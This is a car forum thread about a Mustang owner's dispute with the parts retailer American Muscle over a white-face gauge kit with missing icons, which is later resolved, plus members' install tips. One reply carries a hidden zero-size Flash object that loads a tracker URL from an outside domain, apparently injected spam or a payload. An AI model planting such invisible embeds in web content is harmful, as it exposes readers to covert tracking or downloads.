1st Experience With American Muscle

GOLDENPONY

Founding Member
Jan 23, 2002
LOVELAND, OHIO
First Dealing with American Muscle

--------------------------------------------------------------------------------

I just had my first dealing with American Muscle - maybe the last.
I have a 2006 GT 'vert. Over a year ago I bought a White Face Gauge kit from US SPEEDO. I installed it and it looked great, but I noticed 2 icons were missing (Lost Traction and The Wrench).
I have been living with it, not happy, but livable. I saw that American Muscle is selling a kit made by Simco. I e-mailed American Muscle (twice) and specifically asked about these two icons. I described my problem with US SPEEDO.
I recieved an e-mail back saying that ALL the icons were on their kit.
After thinking about it for a month or so, I went ahead and ordered the American Muscle kit.
I just recieved the kit. The first thing I did was to look at the overlay and sure enough, the two icons I asked about are missing in this kit too.
I called American Muscle and described the whole thing. The first thing the guy said was they needed the e-mail I had gotten from them. Since I thought they were a stand up company, I didn't save it.
They did agree to take the kit back, but I have to pay to ship it back, even though it was their screw up. He almost sounded relieved I didn't have the e-mail.
Hey, it might be a small thing, but since I contacted them BEFORE I ordered the kit, and was given the bad information, I expected them to refund the entire amount including shipping. I guess I expected too much. :mad:

• Sponsors (?)

Sorry to hear about your bad experience, I have nothing but good things say about them. I broke the shorty antenna that I ordered from them, my fault btw, told them what happened and they still sent me a new one at no cost.

Agreed with all the above. I broke the set of sequential tail lights I bought for my mom's 05, called them, described the issue, they sent a brand new set to me free of charge.

It could've been one bad apple in the bunch, basically. I wouldn't forget about them, because they've always been great to my friends and I! Hopefully it doesn't happen again. :nice:

I hear what all you guys are saying. That's one reason I ordered this kit from AM, I've always read great things about their customer service.
I'm hoping we can come to a reasonable solution to this. We're not talking about a huge amount of money here, and I'm sort of puzzled that they would risk alienating a customer over a small amount. It really isn't the money as much as it is principle. I asked this question BEFORE I placed the order and was given bad information. If I had been told how the part was really made, I just wouldn't have ordered it. It wasn't that I got the kit, decided I just didn't like it and wanted to send it back. If that was the case, I'd have been glad to absorb the shipping cost .We'll see. :shrug:

Im pretty sure its policy that they dont pay for return shipping, at least they aren't charging a restock fee which is in their rights to do so. They probably could give u in-store credit if u had the email still or remembered who it was. Does suck though at least u can get most of your money back. I have ordered from them at least a dozen times in the past fews with no problems and excellent customer service when i had an issue or a question about a product. Maybe they

Issue Resolved

I am happy to announce that my issue with American Muscle has been resolved to my satisfaction. I had e-mailed AMNick outlining my complaint. Nick is on vacation, but I was answered by another gentleman, Ryan. I recieved both an e-mail and a phone call. AM sent me a prepaid UPS shipping label by e-mail. I am getting a full refund and they are picking up the return shipping. On top of that, Ryan said they would investigate my complaint concerning the missing icons and try to make sure this wouldn't arise again in future orders.
I am completely satisfied with this outcome. I will surely order from American Muscle again in the future. AM is a "Stand Up Company". :nice:

Good for you! But I figured they would fix the problem for you if you contacted them.

I just ordered a tail light trim set from them yesterday and it was shipped already first thing this morning.

Happy motoring :nice:

This deleted e-mail wouldn't happen to still be in your "Recycle Bin" or in a mail folder called "Deleted Items" would it??<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I have never had an issue with AM.

GT

I havent had a problem with them either. I did get a lower billet grille that doesnt quite fit right for my 09, but that has been about it.

I've been seriously considering white face gauges for quite awhile but now I'm leary about the missing icons. Please keep us updated on your progress in finding a complete gauge face.

Thanks, John

For anyone who has installed the white face gauges, just how difficult is the installation, and how long did it take you>

Thanks

As I have stated in earlier posts, I installed a white face kit from US SPEEDO. The install wasn't too bad. As you might guess, the needle re-install is the trickyest part. I ended getting mine pretty much back dead on.
Except for the missing icons, I liked the kit from American Muscle better than the one I have. I just couldn't see going through the whole install thing all over again for just a slight improbment over what I already have. To tell the truth, I have considered re-installing the original gauge faces, but am not ready to do that either.
The install probably took from between 1 and 2 hours. I did some on an older 2000 GT and the S197 is much easier.

Resurecting an old post. I am going to replace my white face gauges (US Speedo) with US Speedo's stainless steel gauge faces. This overlay has the 2 missing icons I mentioned from my earlier post about the white gauges. I think this is going to be a very nice look - and they work with my "My Color" cluster.